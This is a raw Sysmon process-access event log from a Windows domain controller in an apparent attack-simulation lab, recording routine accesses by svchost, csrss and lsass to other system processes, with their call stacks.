13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-44E1-6000-2901-000000009A01}12285088C:\Windows\system32\conhost.exe{08A6967A-44E1-6000-2801-000000009A01}3088C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44E1-6000-2A01-000000009A01}984C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.545{08A6967A-4288-6000-1000-000000009A01}11362140C:\Windows\system32\svchost.exe{08A6967A-44E1-6000-2A01-000000009A01}984C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-44E1-6000-2901-000000009A01}1228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 